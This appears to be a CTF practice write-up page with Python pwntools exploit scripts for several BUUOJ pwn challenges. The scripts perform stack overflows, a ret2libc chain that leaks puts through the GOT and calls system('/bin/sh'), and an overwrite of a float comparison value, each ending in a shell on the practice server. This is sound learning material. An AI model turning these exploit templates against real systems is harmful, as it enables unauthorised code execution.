a pwn a day keeps sadness away
rip
最简单的栈溢出
from pwn import *
context(arch = 'amd64', os = 'linux')

# DEBUG=1 runs the binary locally; anything else connects to the remote instance.
# Note only the local branch waits for an initial newline before sending.
DEBUG=1
if DEBUG==1:
    s=process('./pwn1')
    s.recvuntil('\n')
else:
    s=remote('pwn.buuoj.cn',6001)

# Value written over the saved return address (hard-coded; assumes the binary is not
# position-independent — confirm with checksec).
system_addr=0x0000000000401186
# 0xF bytes of buffer plus 8 bytes (presumably the saved rbp) before the return address.
# Python 2 pwntools: p64() returns str, so plain string concatenation works here.
payload=0xF*'a'+8*'a'+p64(system_addr)
s.sendline(payload)
s.interactive()
warmup_csaw_2016
最简单的栈溢出
from pwn import *
context(arch='amd64',os='linux')

# DEBUG=0 connects to the remote instance; any other value runs the binary locally
# (the opposite convention from the first script on this page).
DEBUG=1
if DEBUG==0:
    s=remote('pwn.buuoj.cn',20035)
else:
    s=process('./warmup_csaw_2016')

# Value written over the saved return address (hard-coded; assumes a non-PIE binary).
getshell=0x000000000040060D
# 0x40 bytes of buffer plus 8 bytes (presumably the saved rbp) before the return address.
payload=0x40*'a'+8*'a'+p64(getshell)
# Wait for the program's prompt character before sending.
s.recvuntil('>')
s.sendline(payload)
s.interactive()
ciscn_2019_c_1
ret2libc
from pwn import *
context(arch = 'amd64', os = 'linux')

# DEBUG=1 runs the binary locally; anything else connects to the remote instance.
DEBUG=0
if DEBUG==1:
    s=process('./ciscn_2019_c_1')
else:
    s=remote('pwn.buuoj.cn',20115)

# The target binary and the libc build the offsets below are taken from.
# The leak-and-rebase arithmetic is only valid if the remote runs this same libc.
elf=ELF('ciscn_2019_c_1')
libc=ELF('x64_libc.so.6')

# libc-relative offsets: puts/system come from the symbol table; bin_offset is
# hard-coded (presumably the offset of a "/bin/sh" string in this libc — verify
# against the libc file).
puts_offset=libc.symbols['puts']
system_offset=libc.symbols['system']
bin_offset=0x000000000018CD57

# PLT entry and GOT slot of puts in the target binary.
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

main=elf.symbols['main']   # resolved but not used below
# Address returned to after the leak so the overflow can be triggered a second time (hard-coded).
vul_addr=0x00000000004009A0

# 0x50 bytes of buffer plus 8 bytes (presumably the saved rbp) before the return address.
payload=0x50*'a'+8*'a'

# Gadget addresses (hard-coded; rdi_addr is presumably a `pop rdi ; ret` gadget).
# rsi_addr is defined but not used.
rdi_addr=0x000000000000400c83
rsi_addr=0x000000000000400c81

# Stage 1: call puts(puts@got) to leak the runtime address of puts, then return to vul_addr.
payload1=payload+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(vul_addr)

s.recvuntil('!\n')
s.sendline('1')
s.recvuntil('\n')
s.sendline(payload1)

# Read 6 bytes of the leaked pointer and pad to 8 bytes before unpacking it.
s.recvuntil('@\n')
puts_addr=u64(s.recv(6).ljust(8,'\x00'))
print p64(puts_addr)   # Python 2 print statement

# Rebase system and the "/bin/sh" offset using the leaked puts address
# (libc base = puts_addr - puts_offset).
system_addr =puts_addr - puts_offset + system_offset
bin_addr = puts_addr - puts_offset + bin_offset

# Stage 2: system(bin_addr) through the same overflow.
payload2 = payload+p64(rdi_addr)+p64(bin_addr)+p64(system_addr)
s.sendline(payload2)
s.interactive()
pwn1_sctf_2016
最简单的栈溢出
from pwn import *
# 32-bit target, so addresses are packed with p32 below.
context(arch='i386',os='linux')

# DEBUG=0 connects to the remote instance; any other value runs the binary locally.
DEBUG=0
if DEBUG==0:
    s=remote('pwn.buuoj.cn',20086)
else:
    s=process('./pwn1_sctf_2016')

# Value written over the saved return address (hard-coded; assumes a non-PIE binary).
getshell=0x08048F0D
# 0x14 bytes of 'I' plus 4 bytes (presumably the saved ebp) before the 32-bit return
# address. The padding character is 'I' rather than 'a' — presumably the binary treats
# this character specially; confirm against the binary before changing it.
payload=0x14*'I'+4*'a'+p32(getshell)
#s.recvuntil(': ')
# send() rather than sendline(): no trailing newline is appended to the payload.
s.send(payload)
s.interactive()
ciscn_2019_n_1
1.栈溢出至函数参数
2.浮点数在内存中的存储方式(ieee 754)
from pwn import *
#s=process('./ciscn_2019_n_1')
s=remote('node2.buuoj.cn.wetolink.com',28332)
s.recvuntil('\n')
# 44 bytes of padding, then the little-endian bytes 0x41348000. Read as an IEEE 754
# single-precision float that is 11.28125 (sign 0, exponent 130, mantissa 0x348000),
# which is what the "浮点数在内存中的存储方式" note above refers to; the overflow reaches
# a value the program compares rather than the return address.
payload=44*'a'+'\x00'+'\x80'+'\x34'+'\x41'
s.sendline(payload)
print s.recv()   # Python 2 print statement
ciscn_2019_en_2
我做的时候和ciscn_2019_c_1 一样,不知道比赛的时候是什么题